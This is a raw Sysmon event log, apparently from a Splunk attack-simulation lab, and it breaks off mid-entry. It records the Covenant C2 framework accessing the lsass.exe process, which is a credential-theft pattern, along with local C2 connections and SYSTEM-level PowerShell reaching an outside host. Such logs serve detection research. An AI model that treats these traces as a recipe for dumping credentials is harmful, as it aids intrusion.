21:44:13.089{54715871-FD16-60C9-0500-00000000CF01}408368C:\Windows\system32\csrss.exe{54715871-70AD-60CA-2113-00000000CF01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104619Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:13.089{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70AD-60CA-2113-00000000CF01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104618Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:13.089{54715871-70AD-60CA-2113-00000000CF01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000150044Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:13.608{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87FDB2DA7F18BF8F4C4E244ADBFB7675,SHA256=98DA6EAE358048B33D2D25E744D6BDD9C61622755478E439381C4E837A308EFF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150043Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:13.122{39BD8DE3-0F65-60CA-1400-00000000D101}7361576C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150042Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:13.085{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150041Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:13.085{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104627Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:14.450{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CC9CC066ADAC2801368EB1996748280,SHA256=21DC6FBCE7346A3D65BE3F45D96D662685B8E602410130B133738B761E7240EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150046Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:14.624{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9CF335C26E16857C4DF7F2B23971E26,SHA256=9239DA77113B6C6629BF3A329C87AE3D00C49679E257207867BFD698F873FBC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150045Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:14.225{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12745EFF29331148BD0B761AA7CBA0F0,SHA256=29CF904493B2E91EDDF427BF9C80763D616B2557223105C285AA260027E5D2B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104629Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:15.822{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CED813EE2D9914A3454C9EF2ADEDB3FA,SHA256=2278CC8B0ECEE7636531E8EB9975693CC497AFC13ACA76E030A09AC8A8E907C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104628Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:15.818{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1FD6F1AAA32C58BB9FA68888C70736C,SHA256=8B89D5C67DA65D6B8AC301CE4DE5EFC0D07F6965C29F21DBD316DB98282FEC22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150051Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:15.639{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45F163408650501DB798983BBCF224DB,SHA256=337F90D974F9E00A2D19144E65471E2495796910A7C89D52DC3861A9A25F4987,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150050Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:15.539{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17055274D376199901F53282983EBF7A,SHA256=56154671CD3EB5CE7C25D0410DB93DBD9819F6D37E10DE6B29C5D7E70839263C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150049Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:13.020{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58353-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000150048Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:12.905{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeWIN-HOST-14\Administratortcpfalsefalse127.0.0.1win-host-14.attackrange.local58352-false127.0.0.1win-host-14.attackrange.local7443- 354300x8000000000000000150047Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:12.905{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeWIN-HOST-14\Administratortcptruefalse127.0.0.1win-host-14.attackrange.local58352-false127.0.0.1win-host-14.attackrange.local7443- 23542300x8000000000000000150056Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:16.669{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=635E7A35E69E96B0F35F08DFD9C7DA1A,SHA256=867D28EDEF5F6FF9E147D11FC4E68BDF485F89B92FD5DBF5B50BC7CC599764E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150055Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:16.654{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D9035150A351B9B0BF9D95A19285A6,SHA256=4786B983F2C53A2DD915211786DBFDBB76912BE2DBCAFB7E0000767678C966C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150054Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:16.402{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000150053Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:14.322{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeWIN-HOST-14\Administratortcpfalsefalse127.0.0.1win-host-14.attackrange.local58356-false127.0.0.1win-host-14.attackrange.local7443- 354300x8000000000000000150052Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:14.322{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeWIN-HOST-14\Administratortcptruefalse127.0.0.1win-host-14.attackrange.local58356-false127.0.0.1win-host-14.attackrange.local7443- 354300x8000000000000000104631Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:15.823{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55392-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104630Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:17.183{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F3B1AB0E6691A3260CE66422AFAC102,SHA256=96E32FD0E90B183A06BA29F503E4F9DFB79BCA5069674836BA563BA262D5FB4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150060Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:17.668{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66674B3DDB1FFD3E59B5CC1A2F3ABC8C,SHA256=1871596694FC2EAB14DFCC8C2EEFD402B5AF4ED1405B0BE7C92FC2FA8B05F887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150059Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:17.368{39BD8DE3-269B-60CA-EA03-00000000D101}6156WIN-HOST-14\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6156.xml~RF17cbc62.TMPMD5=400B39C52D00FF39E60B91C74A63733D,SHA256=75361EBE398182A3C87957C2D93EC97E3D4C1D9F04A67DFAA0AF23753BF512B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150058Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:15.458{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeWIN-HOST-14\Administratortcpfalsefalse127.0.0.1win-host-14.attackrange.local58358-false127.0.0.1win-host-14.attackrange.local7443- 354300x8000000000000000150057Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:15.458{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeWIN-HOST-14\Administratortcptruefalse127.0.0.1win-host-14.attackrange.local58358-false127.0.0.1win-host-14.attackrange.local7443- 23542300x8000000000000000104632Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:18.546{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=667B2BAE8E20C041DC7AD9274D574C0E,SHA256=C8B2667E4A4873CC8E4EED9E724039455135CC4C38CE9EEEA5BE60333E597318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150061Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:18.684{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DA8EFDC16E5359DE13D4B5677ACA6AE,SHA256=95566161AC1B454A7CC42B9B6BBF3755C42346FBB3D5AF82C863D0463DD984AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104633Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:19.910{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A20F9A6271687E6A8A4189D77273D88,SHA256=B54800D447444B6D730C4032E6C73BEE4FF7220EAC0850CAC778BDA57D426A66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150062Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:19.685{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2E635DB98BB12BE3676B20DAD006443,SHA256=4A3FA28E9BCF838E43B4452FA4F57FE5B172BE775F94BC38C2A63AF4537B6C7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150065Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:20.704{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2599A4BA613E5CA14381FFF2672893E0,SHA256=250C57E7E5994817EB52DA8649F33688070738C0876C52571F4C018AEE764765,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150064Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:18.873{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58359-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150063Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:20.085{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FEF9621A9EA6F3027C6D317BBB742A16,SHA256=A62FA79A3C8AE3288C2E859B30E54165DBA335B8FE9084044257C8C3C8AEAB2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104634Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:21.276{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0200D77F9B781BAD3DD21128986D4FC,SHA256=0551D5333D393351706257C765BC86E2D63D18CE6E798D1D73B16904E28A6120,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150066Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:21.722{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAD10C6A4EAB0225C56BC290057BB254,SHA256=AB29FAFFB5F6D67E1F44085EFA23CEFFD41846ABB91102205C92997E7EE21102,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104635Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:22.637{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E9AE11531F8E8B238A102E3B6F3AF66,SHA256=E6ED68769348B6A0D6EAC6B4FF11E0619ABEA88DC6C95ABABCF3056426D49D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150068Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:22.768{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=062DB80ECA1DDF57A666878EE28700AC,SHA256=13B5D57E2F6FAAD81A3F5B43428F301272CFDBA00AB6DEBDED0D4EE5897FF33E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150067Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:22.421{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D4622C1501FF986B11A6E16AA2A0B15,SHA256=6F40BA1DE6598893E5DAF08B03131E05855B4677B34FAA77E055D80C907BD089,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104636Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:21.766{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55393-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150070Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:23.802{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F561359A8EABF6FA08B1E31E71630586,SHA256=F2AA57B923B7DFDCF990591A8776AB0E7537B0D6F8AEC005E21B33A773DAB349,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150069Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:21.221{39BD8DE3-26DA-60CA-F703-00000000D101}5228C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58361-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000104637Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:24.000{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=081A9176215453AD8BACF43D4EE74D6F,SHA256=6D71A5358526637CAFDBD5AF26E314915EC872E43DEA67CA99CD6B25E09E8B90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150075Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:24.819{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C61CBB37B2E9F175C230A7469D17ED7,SHA256=02F570A85670E1FC80A7AC8F51042DFA0637D609155F9B2CDE76E38D7A87B2C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150074Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:24.704{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla 